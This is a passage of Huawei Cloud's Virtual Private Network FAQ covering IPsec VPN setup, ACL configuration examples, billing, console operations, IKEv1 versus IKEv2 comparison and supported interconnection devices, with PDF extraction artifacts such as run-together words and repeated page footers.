2.31 Do I Need to Purchase an EIP for Servers ThatCommunicate with Each Other Through a VPN?

If a server in your data center needs to access an ECS on the cloud through a VPN,you do not need to purchase an EIP.

If the ECS needs to provide services accessible from the Internet, an EIP is required.

2.32 Where Can I Add a Route to Reach the RemoteSubnet on the VPN Console?

When a VPN connection is created, a route is automatically delivered to reach theremote subnet.

2.33 Will I Be Notified If a VPN Connection IsInterrupted?

The VPN connection status can be monitored. After a VPN connection is created,the VPN service reports the connection status information to Cloud Eye, but does

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 33

not automatically send alarm notifications to you. To receive notifications, createalarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPNconnection and choose Operation > View Metric to view the VPN connectionstatus.

Figure 2-5 View Metric

2.34 What Can I Do If VPN Connection Setup Fails?1. Check the IKE and IPsec policies to see whether the negotiation modes and

encryption algorithms between the local and remote sides of the VPN are thesame.

a. If the IKE policy has been set up during phase one and the IPsec policyhas not been enabled in phase two, the IPsec policies between the localand remote sides of the VPN may be inconsistent.

b. If a Cisco physical device is used at the customer side, it is recommendedthat you use MD5. Then, set Authentication Mode to MD5 in the IPsecpolicy for the VPN created on the cloud.

2. Check whether the ACL configurations are correct.If the subnets of your data center are 192.168.3.0/24 and 192.168.4.0/24, andthe VPC subnets are 192.168.1.0/24 and 192.168.2.0/24, configure the ACLrules for each data center subnet to allow the communication with the VPCsubnets. The following provides an example of ACL configurations:rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255

3. After the configuration is complete, ping the local and the remote side fromeach other to check whether the VPN connection is normal.

2.35 Which Direction of the Bandwidth Is Limited andWhat Is the Unit of the Bandwidth?

Your purchased VPN gateway bandwidth is used in the outbound direction. Tobalance the traffic in the inbound and outbound directions, the bandwidth in theinbound direction is limited.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 34

● If the purchased bandwidth is less than or equal to 10 Mbit/s, the bandwidthin the inbound direction is limited to 10 Mbit/s.

● If the purchased bandwidth is more than 10 Mbit/s, the bandwidth in theinbound direction is the same as that of the purchased bandwidth.

The unit of bandwidth is Mbit/s and that of traffic is GB.

Virtual Private NetworkFAQ 2 Product Consultation

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 35

3 Networking and Application Scenarios

3.1 Can I Visit Websites Across International BordersUsing a VPN?

No.

VPN connects a VPC and the network of an on-premises data center, that is, site-to-site connection.

3.2 Can I Deploy Applications on the Cloud, Databasesin an On-premises Data Center, and Then ConnectThem Through a VPN?

VPN connects a VPC and an on-premises network.

After the VPN is set up successfully, the VPC and the on-premises network cancommunicate with each other. In this case, the application server accessing thedatabase is just the same as accessing other servers in the same LAN.

Servers on the cloud and those in the data center can communicate with eachother.

NO TICE

● After a VPN is set up, check whether the network latency and packet lossadversely affect service running.

● It is recommended that you run the ping command to check the packet lossand network latency details.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 36

3.3 How Many VPN Connections Do I Need to Connectto Multiple Servers in a Data Center?

HUAWEI CLOUD IPsec VPN connects a VPC on the cloud and subnets in your on-premises data center. Therefore, the number of VPN connections is irrelevant tothe number of servers, but is related to the number of data centers where theservers are located.

In most cases, an on-premises data center has a public network gateway. Allservers connect to the Internet through this gateway. Therefore, you only need toconfigure one VPN connection to allow communications between HUAWEI CLOUDVPC and your network.

3.4 Do I Need to Install the IPsec Software on EachServer That Needs to Access an ECS to Establish a VPNConnection?

No.

HUAWEI CLOUD VPN connects two LANs. Multiple servers in the customer datacenter use the same public IP address to access the cloud. If you install the IPsecsoftware for the servers, the VPN gateway on the cloud will receive negotiationpackets from different servers and then the system receives a large amount ofrepeated negotiation information, which causes connection exceptions or evenconnection unavailability.

It is recommended that you use the egress firewall to configure a VPN to connectto the cloud. When creating a VPN, you can specify multiple CIDR blocks. Youshould only allow servers of developers to access the ECS on the cloud based onthe security group on the cloud or the security rules of the customer data center.

3.5 What Are the Differences Between the ApplicationScenarios and Connection Modes of IPsec and SSLVPNs?

ScenariosIPsec VPN connects two LANs, such as a branch and its headquarter, or a local IDCand a VPC.

SSL VPN connects a client to a LAN. For example, the portable computer of anemployee on a business trip accesses the internal network of the company.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 37

Connection Modes

IPsec VPN requires fixed gateways, such as firewalls or routers, at both ends. Theadministrator needs to configure gateways at both ends to complete IPsec VPNnegotiation.

SSL VPN needs to install a specified client software on the server to connect to theSSL device through the username and password.

NO TE

HUAWEI CLOUD only supports IPsec VPNs.

3.6 Does a VPN Allow for Communications BetweenTwo VPCs?

● If the two VPCs are deployed in the same region, use a VPC peeringconnection to connect them.

● If the two VPCs are deployed in different regions, use a VPN connection toconnect them. The detailed operations are as follows:

a. Create a VPN gateway for each VPC and create VPN connections for thetwo VPN gateways.

b. Set the remote gateway address of each VPN connection to the gatewayIP address of the peer side.

c. Set the remote subnet of each VPN connection to the CIDR block of thepeer VPC.

d. The pre-shared keys and algorithm parameters of the two VPNconnections must be the same.

3.7 What Are the Impacts of a VPN on an On-premisesNetwork? What Are the Changes to the Route forAccessing an ECS?

When you configure a VPN, configure the following on the gateway of the on-premises data center.

1. Configure IKE/IPsec policies.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 38

2. Specify interesting traffic (ACL rules).3. Check the route of the gateway in the on-premises data center to ensure that

traffic destined for the HUAWEI CLOUD VPC is routed to the correct egressinterface (the interface with IPsec policy bound).

After the VPN configuration is complete, only the traffic matching the ACL rulesenters the VPN tunnel.

For example, before a VPN is created, on-premises users access the ECS throughthe EIP bound to the ECS. After the VPN is created, data flows matching the ACLrules access the private IP address of the ECS through the VPN tunnel.

3.8 What Configurations Are Required on Both Ends ofa VPN to Implement the Communication Between aCustomer Data Center and a VPC?

To implement the VPN interconnection, create a VPN on the cloud and configurethe gateway device of the customer data center.

● Creating a VPN on the cloud: Buy a VPN gateway (select the billing mode,bandwidth size, and the VPC to be associated). Buy a VPN connection (specifythe gateway IP addresses, subnets, and negotiation policies at both ends).

● Configuring the VPN device of the customer data center: Select the public IPaddress of the customer data center, configure the first and second phases ofIPsec negotiation on the device that supports IPsec VPN, and then configurenetwork routes, NAT, and security rules.

3.9 Can I Use a Network with Two Egresses to EstablishTwo VPN Connections with the Same VPC?

No.

When creating a VPN, a local subnet is a VPC subnet, and a remote subnet is thesubnet of an on-premises data center. If the two connections use the same localsubnet and remote subnet, the VPN connections will fail.

3.10 Can I Connect Two VPCs in the Same RegionThrough a VPN?

No.

For two VPCs in the same region, you can use a VPC peering or Cloud Connectconnection to connect them.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 39

3.11 How Can I Connect Two VPCs in the Same Region?Two VPCs in the same region can be connected using a VPC peering or CloudConnect connection. VPC Peering can only connect VPCs in the same region, andCloud Connect can also connect VPCs in different regions.

3.12 How Do I Replace a Direct Connect Connectionwith a VPN?

1. Ensure that the gateway of the on-premises data center supports IPsec VPN.2. Create a VPN gateway (select the VPC to which the Direct Connect

connection uses) and a VPN connection on HUAWEI CLOUD.

NO TICE

When creating a VPN connection, configure its remote subnet as follows toavoid routing conflicts.● Delete the virtual interface of the Direct Connect connection first and then

configure the VPN connection.● Divide the remote subnet into two subnets and configure the VPN

connection. After the Direct Connect connection is deleted, configure theVPN connection again.

3.13 How Do I Enable Communication Among TwoVPCs and an IDC Network?

Network TopologyIDC-VPC 1-VPC 2

NO TE

IDC indicates the on-premises data center. A VPN connection is established between VPC 1and the IDC.

Procedure1. Check whether the two VPCs are in the same region.

– If the two VPCs are in the same region, use a VPC peering or CloudConnect connection (free of charge) to connect them.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 40

– If the two VPCs are in different regions, use a Cloud Connect connection(you need to pay for the bandwidth fee).

2. Establish a VPN connection between the IDC and a VPC. Change the remotesubnet of the IDC to the subnets of VPC 1 and VPC 2. The local subnet of VPC1 must contain the subnet connected through a VPC peering or CloudConnect connection. The subnet route of the VPC peering or Cloud Connectconnection should destine for the IDC subnet.

3.14 How Do I Connect Four Subnets?Figure 3-1 shows the network topology.

Figure 3-1 Network Topology

1. Use a VPN or Direct Connect connection to connect IDC 1 to VPC 1.

2. Use a Cloud Connect connection to connect VPC 1 to VPC 2. (You can also usea VPC peering connection to enable communications between VPC 1 and VPC2 if they are in the same region.)

3. Use a VPN or Direct Connect connection to connect IDC 2 to VPC 2.

4. Configure routes for the four subnets involved in VPN, Cloud Connect, andDirect Connect connections to enable communication between them.

3.15 Do I Need Two VPN Connections to Connect FourSubnets of Two Regions If Each Region Has TwoSubnets?

No.

Only one VPN connection is required between two regions. The subnets can all beadded to the VPN connection.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 41

In this scenario, if you attempt to create a second VPN connection, themanagement console displays a message indicating that a conflict occurs becausethe two connections have the same remote gateway address.

3.16 Can I Access OBS Through a VPN?Yes.

With the help of the VPC Endpoint Service, you access OBS through a VPN. Createtwo VPC endpoints for the private DNS server and OBS, respectively.

Configure the private DNS server and route of HUAWEI CLOUD on the customerside.

3.17 How Do I Interconnect My Personnel Computerwith a VPN?

Common home broadband routers, personal mobile terminals, and VPN services(such as L2TP) provided by Windows hosts cannot interconnect with HUAWEICLOUD VPN.

To interconnect with HUAWEI CLOUD VPN, on-premises devices must support thestandard IPsec protocol.

3.18 How Do I Access HUAWEI CLOUD ECSs FromHome After My Enterprise Network Is Connected toHUAWEI CLOUD Through a VPN?

HUAWEI CLOUD VPN connects the VPC on the cloud and the local area network(LAN) off the cloud.

The home network is not a part of the LAN of your enterprise and cannot bedirectly connected to the VPC on the cloud.

If your host at home needs to access VPC resources on the cloud, your host candirectly access the EIP of the cloud service or connect to the LAN of yourenterprise through SSL VPN (if your enterprise supports SSL access) and thenaccess VPC resources on the cloud through the LAN.

3.19 How Do I Create a VPN Connection Temporarily IfNo Device That Supports IPsec Is Available off theCloud After I Purchase HUAWEI CLOUD VPN Gatewayand Connections?

To establish a VPN connection with HUAWEI CLOUD, a device that supportsstandard IPsec and a fixed public IP address must be available off the cloud.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 42

To temporarily connect to HUAWEI CLOUD, install third-party software on thehost.

Recommended third-party IPsec software: strongSwan, Openswan, and GreenBow.For details, see Virtual Private Network Administrator Guide.

3.20 How Do I Select a Proper Region on the CloudWhen Creating a VPN Gateway?

It is recommended that you select the region where your on-premises data centerlocates when you create a VPN gateway for lower network latency.

But you can select a VPC in any region when you create a VPN gateway.

● For multiple VPCs in the same region, you only need to create one VPNgateway because the VPCs can be connected using VPC peering connections(free of charge).

● For multiple VPCs across regions, you can use VPN and Cloud Connectconnections to connect them.

Virtual Private NetworkFAQ 3 Networking and Application Scenarios

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 43

4 Billing and Payments

4.1 What Will I Be Billed for Creating a VPN? Will I BeBilled for VPN Gateway IP Addresses?

VPNs are billed on a yearly/monthly or pay-per-use basis. You need to pay forboth the VPN gateway bandwidth or traffic price and the VPN connection price.

VPN gateways can be billed by traffic or bandwidth.

1. A yearly/monthly VPN gateway can only be billed by bandwidth. The price ofa yearly/monthly VPN gateway includes the price of the VPN connections thatcan be created for the gateway and the bandwidth price.

2. The billing cycle of the pay-per-use billing mode is one hour. If you choose apay-per-use VPN gateway, a VPN connection must be purchased togetherwith the VPN gateway. The price includes the VPN gateway bandwidth ortraffic price and the price of the VPN connection created together with thegateway. If you create another connection for the gateway, you will becharged for the additional connection.

NO TE

● The IP address of the VPN gateway will not be billed.

● A VPN gateway cannot share a bandwidth with an EIP bound to an ECS.

4.2 What Is the Difference Between Billing a VPNGateway by Bandwidth and by Traffic?

The pay-per-use billing mode for VPN gateways supports both billing bybandwidth and billing by traffic. Their differences are as follows:● Billing by bandwidth: The billing cycle is one hour. The generated fee depends

on the bandwidth size.● Billing by traffic: The traffic fees generated each hour will be collected. The

billing is based on the generated traffic going out of a VPC. The bandwidthsize does not affect the price of the public traffic per GB.

Virtual Private NetworkFAQ 4 Billing and Payments

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 44

4.3 Can a VPN Billed by Traffic Use a Shared DataPackage?

No.

The VPN service is billed independently and cannot use the shared data package.

4.4 How Many VPN Connections Will I Be Charged toConnect VPCs in Different Regions?

VPNs can be used to connect VPCs in different regions. The VPN bandwidth andconnections of each region will be billed independently. Example:

In Region A, you establish one VPN connection with Region B and another VPNconnection with Region C, then

● The VPN gateway of Region A has two connections.● The VPN gateway of Region B has one connection.● The VPN gateway of Region C has one connection.

In this case, you will be charged for four VPN connections.

4.5 When Will VPN Resources Be Frozen? How Can IUnfreeze VPN Resources?

● If pay-per-use VPN resources are in arrears, they will enter the retentionperiod and be frozen. Frozen resources are unavailable and cannot bemodified or deleted. If the retention period ends and you still have not toppedup and pay off the arrears, the resources will be released and cannot berestored. To ensure that resources are available, top up your account and payoff the arrears before the resources expire.

● Frozen VPN resources will become available after you renew them or top upyour account. If a VPN connection is in the not connected state, initiate dataflows (for example, ping hosts on different subnets) to trigger the VPNconnection to be in the normal state.

Virtual Private NetworkFAQ 4 Billing and Payments

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 45

5 Related Operations on the Console

5.1 What Are the Relationships Between a VPC, a VPNGateway, and a VPN Connection?

● A VPC is a private network on the cloud. Multiple VPCs can be created in thesame region but are isolated from each other. A VPC can be divided intomultiple subnets.

● A VPN gateway is created based on a VPC and is the access point of a VPNconnection. Only one VPN gateway can be purchased for each VPC, butmultiple VPN connections can be created for each gateway.

● A VPN connection is created based on a VPN gateway and is used to connecta VPC to an on-premises data center (or a VPC in another region). That is,each VPN connection connects to a gateway of an on-premises data center.

NO TE

The number of VPN connections is irrelevant to the number of local subnets andremote subnets. It is only related to the number of data centers (or VPCs in otherregions) connected to your VPC. The created VPN connections are displayed in theVPN connection list. You can also view the number of VPN connections created foreach VPN gateway.

5.2 How Long Does It Take for Delivered VPNConfigurations to Take Effect?

It takes 1 to 5 minutes for the VPN configurations to take effect.

NO TE

After the VPN configurations take effect, configure the gateway on your side to completetunnel negotiation with the VPN gateway on HUAWEI CLOUD. Then, the VPN connection issuccessfully established.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 46

5.3 Why Is the VPN Connection Always in the NotConnected State Even After Its Configuration IsComplete?

Ensure that the pre-shared keys and negotiation information at both ends areconsistent. The local subnet and VPN gateway on the cloud are the remote subnetand remote gateway in the on-premises data center. The remote gateway andremote subnet on the cloud are the local gateway and local subnet in the on-premises data center.

Ensure that the routing, NAT, and security rules are correctly configured on thegateway device of your on-premises data center. Then, ping the servers in subnetsat both ends.

NO TE

VPN is triggered based on data flows. After you configure the VPN, ping the servers in thepeer subnet. Before running the ping command, disable the server firewall and allowinbound ICMP requests in the security group on the cloud.Pinging the gateway IP address cannot trigger VPN negotiation. Ping the server in thesubnet protected by the gateway.

5.4 Can a VPN Gateway IP Address Be Retained Afterthe VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway isdeleted.

Deleting a VPN gateway will also delete the resources associated with thegateway.

NO TICE

Deleting the last connection of a pay-per-use VPN gateway will also delete thegateway. If you want to retain the IP address, do not delete the last VPNconnection.

5.5 Do I Need to Create a VPN Gateway or a VPNConnection for Creating a VPN? Which InformationAbout a Created VPN Can Be Modified?

Prerequisites for creating a VPN

Create a VPC and a VPC subnet. The VPC subnet cannot conflict with the subnetof the on-premises data center.

To create a VPN, you need to:

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 47

● Create a VPN gateway. The gateway IP address and bandwidth have beenassigned. Set Region, Name, Billing Mode, VPC to be associated, Billed By,and Bandwidth. Only configurations for Name and Bandwidth can bemodified after the VPN gateway is created.

● Create a VPN connection. Specify the connection name, associated VPNgateway, local subnet, PSK, remote gateway, remote subnet, and negotiationpolicies. The connection name, local subnet, PSK, remote gateway, remotesubnet, and negotiation policies can be modified after the VPN connection iscreated.

5.6 Do I Need to Configure ACL Rules on the HUAWEICLOUD Management Console After I Configured ACLRules on the Gateway Device of the On-premises DataCenter?

You need to create ACL rules dedicated for the gateway device of the on-premisesdata center and the ACL rules will be referenced by IPsec policies.

When you configure the VPN on the cloud, the ACL rules will be automaticallygenerated based on the local and remote subnets entered on the managementconsole and then delivered to the VPN gateway. The number of ACL rules isobtained by multiplying the number of local subnets and that of remote subnets.

5.7 What Do I Do If an Exception Occurs When I Add aRemote Subnet During VPN Connection Creation?

Check whether this remote subnet has been used as the destination of a VPCpeering, Cloud Connect, or Direct Connect connection route, which causes routingconflicts. If yes, delete the route and create a new one.

5.8 Where Can I Add a Route to Reach the RemoteSubnet on the VPN Console?

When a VPN connection is created, a route is automatically delivered to reach theremote subnet.

5.9 Can I Performed Operations on HUAWEI CLOUDVPNs Using APIs?

VPN requires complex configurations. Currently, VPN resources cannot be created,queried, or modified through APIs. You can only perform these operations on themanagement console.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 48

5.10 What Is a Remote Gateway and Remote Subnet ina VPN Connection?

When creating a VPN connection, a subnet in HUAWEI CLOUD VPC is the localsubnet and the created VPN gateway is the local gateway. The connected subnetin the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.

A remote gateway IP address is a public network IP address.

5.11 How Do I Disable the PFS Function When Creatinga VPN Connection?

You can disable the Perfect Forward Secrecy (PFS) function for some regions onHUAWEI CLOUD. You are advised to enable the PFS function in the on-premisesdata center, because it improves IKE negotiation security in phase 2.

By default, the PFS function is disabled on some vendors' devices. Check the deviceconfiguration manual to ensure that the PFS function is enabled.

NO TE

● PFS is a security feature.IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsecSA) is derived from the key generated in phase one. Once the key in phase one isdisclosed, the security of the IPsec VPN may be adversely affected. To improve the keysecurity, IKE provides the PFS function. After PFS is turned on, an additional DHexchange will be performed during IPsec SA negotiation, and a new IPsec SA key will begenerated, improving IPsec SA security.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is alsoenabled on the gateway in your on-premises data center. Otherwise, the negotiation willfail.

5.12 What Is the Limitation on the Number of Localand Remote Subnets of a VPN? Why Is an ErrorMessage Displayed When I Update the Local Subnet bySpecifying a CIDR Block?

● You can configure up to 5 local subnets. The product of the number of localsubnets and the number of remote subnets cannot exceed 255.

● A VPC delivers VPC subnet routes based on the remote subnets of the VPNconnection, remote subnets of the Direct Connect connection, and subnets ofthe VPC peering connection. Each subnet has one subnet route.

● The number of VPC subnet routes cannot exceed 200. That is, the totalnumber of remote subnets of the VPN connection, remote subnets of theDirect Connect connection, subnets of the VPC peering connection, andcustom routes in a VPC cannot exceed 200.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 49

5.13 What Are the Precautions for Configuring theLocal and Remote Subnets of a VPN Connection?

● You can configure up to 5 local subnets. The product of the number of localsubnets and the number of remote subnets cannot exceed 255. If 255 isexceeded, consider supernetting the local or remote subnets.

● The local subnet cannot include the CIDR block of the remote subnet.● There are routes pointing to the local subnet in the VPC where the VPN

gateway resides.● If there are two connections (connection A and connection B) created for a

VPN gateway, and the remote subnet of connection A is within that ofconnection B, when the destination network to be accessed belongs to theoverlapped network segment, the connection created first is matched first,regardless of the connection status. (Mask length match is not used for thepolicy-based VPN.)

5.14 Why the Status of a VPN Connection Is NotConnected on the Management Console When It IsAlready Available?

There is a latency to display the latest VPN connection status on the managementconsole.

If the service access is normal, the VPN connection is established. After severalminutes, the VPN connection status will be Connected.

5.15 What Do I Do If a Message Is Displayed IndicatingThat the VPN Connection Does Not Exist AfterNegotiation Policies Are Modified?

This problem is caused by the page refresh interval.

When you modify the advanced settings, the system first deletes the VPNconnection and then creates one. If the page displays the message indicating thatthe connection is being deleted or created for a short period of time, do not createthe same connection (with the same local subnet, remote subnet, and remotegateway) again.

If the page remains in the connection deleting or creating state for a longtime,submit a service ticket.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 50

5.16 What Should I Do If I Cannot Create Connectionsfor a VPN Gateway That Has No BandwidthInformation?

If a VPN gateway has no bandwidth information, the VPN is of the old edition andthis type of VPN cannot be created on HUAWEI CLOUD anymore.

● Only one VPN connection can be created for each VPN gateway of the oldedition and its bandwidth is not guaranteed. You can delete the gateway andcreate one of the new edition (service running will be affected).

● You can also submit a service ticket to change the gateway to one of thenew edition (service running will not be affected).By default, the bandwidth of a VPN gateway changed to the new edition is 10Mbit/s. You can adjust the bandwidth as required. The bandwidth of a VPNgateway that is billed on a yearly/monthly basis cannot be decreased.

5.17 How Do I Reset a VPN Connection?● Disable the VPN connection on the device off the cloud. After the status of

the VPN connection on the cloud changes to Not connected, enable the VPNconnection on the device off the cloud.

● Change the remote gateway IP address of the VPN connection on the cloud toany other IP address. After the status of the connection off the cloud changesto inactive, change the remote gateway IP address on the cloud to the currentIP address.

5.18 What Is the Maximum Bandwidth Supported by aVPN Gateway?

The maximum bandwidth supported by a VPN gateway is 300 Mbit/s.

5.19 Which IKE Version Should I Select When I Create aVPN Connection?

HUAWEI CLOUD recommends you to select IKEv2 for negotiation because IKEv1 isnot secure. In addition, IKEv2 has better performance than IKEv1 in terms ofconnection negotiation and establishment, authentication methods, DPD timeout,and SA timeout.

HUAWEI CLOUD will not support IKEv1 soon.

Introduction to IKEv1 and IKEv2● IKEv1 is a hybrid protocol, and its own complexity inevitably brings some

security and performance defects, which has become the bottleneck of thecurrent IPsec system.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 51

● The IKEv2 protocol reserves the basic functions of IKEv1 and overcomes theproblems found during IKEv1 study. Moreover, for considerations of simplicity,efficiency, security, and robustness, relevant IKE documents are replaced byRFC 4306. By minimizing core functions and default password algorithms,IKEv2 greatly improves the interoperation capability among different IPsecVPNs.

IKEv1 Security Vulnerabilities● The cryptographic algorithms supported by IKEv1 have not been updated for

more than 10 years. Also, IKEv1 does not support strong cryptographicalgorithm such as AES-GCM and ChaCha20-Poly1305. For IKEv1, the E(Encryption) bit in the ISALMP header specifies that the payloads followingthe ISALMP header are encrypted, but any data integrity verification of thosepayloads is handled by a separate hash payload. This separation of encryptionfrom data integrity protection prevents the use of authenticated encryption(AES-GCM) with IKEv1.

● IKEv1 protocol is vulnerable to DoS amplification attacks. IKEv1 is vulnerableto half-open connections.IKEv2 can defend against DoS attacks.

● The IKEv1 aggressive mode is not secure enough. In aggressive mode,information packets are not encrypted. There are also brute-force attacks,such as man-in-the-middle attacks.

Differences Between IKEv1 and IKEv2● Negotiation process

– IKEv1 SA negotiation consists of two phases. IKEv1 is complex andoccupies a large amount of bandwidth. IKEv1 phase 1 negotiation aims toestablish the IKE SA. This process supports the main mode and aggressivemode. Main mode uses six ISAKMP messages to establish the IKE SA, butaggressive mode uses only three. Therefore, aggressive mode is faster inIKE SA establishment. However, aggressive mode does not provide thePeer Identity Protection because key exchange and identityauthentication are performed at the same time. IKEv1 phase 2negotiation aims to set up the IPsec SA for data transmission. Thisprocess uses the fast exchange mode (3 ISAKMP messages) to completethe negotiation.

– Compared with IKEv1, IKEv2 simplifies the SA negotiation process. IKEv2uses two exchanges (a total of 4 messages) to create an IKE SA and apair of IPsec SAs. To create multiple pairs of IPsec SAs, only oneadditional exchange is needed for each additional pair of SAs.

NO TE

For IKEv1 negotiation, its main mode requires nine (6+3) packets in total and itsaggressive mode requires 6 (3+3) packets. IKEv2 negotiation requires only 4(2+2) packets.

● Authentication methods– Only IKEv1 (requiring an encryption card) supports digital envelope

authentication (HSS-DE).– IKEv2 supports EAP authentication. IKEv2 can use an AAA server to

remotely authenticate mobile and PC users and assign private IP

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 52

addresses to these users. IKEv1 does not provide this function and mustuse L2TP to assign private IP addresses.

– Only IKEv2 supports IKE SA integrity algorithms.● DPD timeout

– Only IKEv1 supports the retry-interval parameter. If a device sends aDPD packet but receives no reply within the specified retry-interval, thedevice records a DPD failure event. When the number of failure eventsreaches five, both the IKE SA and IPsec SA are deleted. The IKE SAnegotiation will be started again when the device has IPsec traffic tohandle.

– In IKEv2 mode, the retransmission interval increases from 1, 2, 4, 8, 16, 32to 64 seconds. If no reply is received within eight consecutivetransmissions, the peer end is considered dead, and the IKE SA and IPsecSA will be deleted.

● IKE SA timeout and IPsec SA timeoutIn IKEv2, the IKE SA soft lifetime is 9/10 of the IKE SA hard lifetime plus orminus a random value to reduce the likelihood that two endpoints initiate re-negotiation at the same time. Therefore, soft lifetime does not require manualsettings in IKEv2.

Advantages of IKEv2 Over IKEv1● Simplified the SA negotiation process, improving the negotiation efficiency.● Closed many cryptographic loopholes, improving security.● Supports Extensible Authentication Protocol (EAP) authentication, improving

authentication flexibility and scalability.● EAP is an authentication protocol that supports multiple authentication

methods. The biggest advantage of EAP is scalability. That is, newauthentication modes can be added without changing the originalauthentication system. Currently, EAP authentication has been widely used indial-up access networks.

● IKEv2 employs an encrypted payload that is based on the design of ESP. TheIKEv2 encrypted payload associates encryption and data integrity protectionin a fashion that makes it possible to use authenticated encryptionalgorithms. AES-GCM ensures confidentiality, integrity, and authentication.

5.20 What Are the Categories of VPN Service Tickets?How Do I Create a VPN Service Ticket?

1. Log in to the management console.2. In the upper right corner of the management console, choose Service Tickets

> Create Service Ticket.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 53

Figure 5-1 Create Service Ticket

3. Search for VPN and select Virtual Private Network (VPN).

Figure 5-2 Selecting Virtual Private Network (VPN)

4. Select the service ticket type.

Figure 5-3 Selecting the service ticket type

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 54

NO TE

When you submit a service ticket, select a ticket type to facilitate problem handling.

Figure 5-4 Ticket category and classification basis

5.21 Are a Username and Password Required forCreating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication.The key is configured on a VPN gateway. A tunnel will be established after VPNnegotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords forauthentication.

NO TE

IPsec XAUTH is an extended technology of IPsec VPN. It prompts users to enter theirusernames and passwords during VPN negotiation.HUAWEI CLOUD VPN does not support IPsec XAUTH.

5.22 Which VPN Resources Can Be Monitored?VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inboundbandwidth, outbound traffic, outbound bandwidth, and outbound bandwidthusage.

To view VPN gateway metrics, locate the target VPN gateway and click ViewMetric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is not connected.

To view the VPN connection status, locate the target VPN connection and clickView Metric in the Operation column.

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 55

5.23 Will I Be Notified If a VPN Connection IsInterrupted?

The VPN connection status can be monitored. After a VPN connection is created,the VPN service reports the connection status information to Cloud Eye, but doesnot automatically send alarm notifications to you. To receive notifications, createalarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPNconnection and choose Operation > View Metric to view the VPN connectionstatus.

Figure 5-5 View Metric

Virtual Private NetworkFAQ 5 Related Operations on the Console

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 56

6 VPN Negotiation and Interconnection

6.1 What Devices Can Be Connected to HUAWEICLOUD Through a VPN?

HUAWEI CLOUD VPN supports the standard IPsec protocol. Devices in your datacenter can connect to HUAWEI CLOUD if the following requirements are met:

● Devices support IPsec VPN.● Your data center has a fixed public IP address or an IP address obtained after

performing NAT mapping on a fixed public IP address.

Devices are mostly routers and firewalls. For details about the interconnectionconfiguration, see Administrator Guide.

NO TE

● Common home broadband routers, personal mobile terminals, and VPN services (suchas L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

● Devices that can interconnect with the HUAWEI CLOUD VPN service are usually fromthe following:● Vendors such as Huawei (routers and firewalls), H3C (routers and firewalls), Cisco

(routers and firewalls), Ruijie (routers and firewalls), ZTE, Sangfor, Fortinet, 360,Topsec, Hillstone, NetentSec, NSFOCUS, DELL, ZyXEL, and Juniper

● Cloud service providers such as Alibaba Cloud, Tencent Cloud, and Amazon WebServices

● Software vendors such as Openswan, strongSwan, and GreenBow● The IPsec protocol is a standard IETF protocol. Devices that support IPsec can

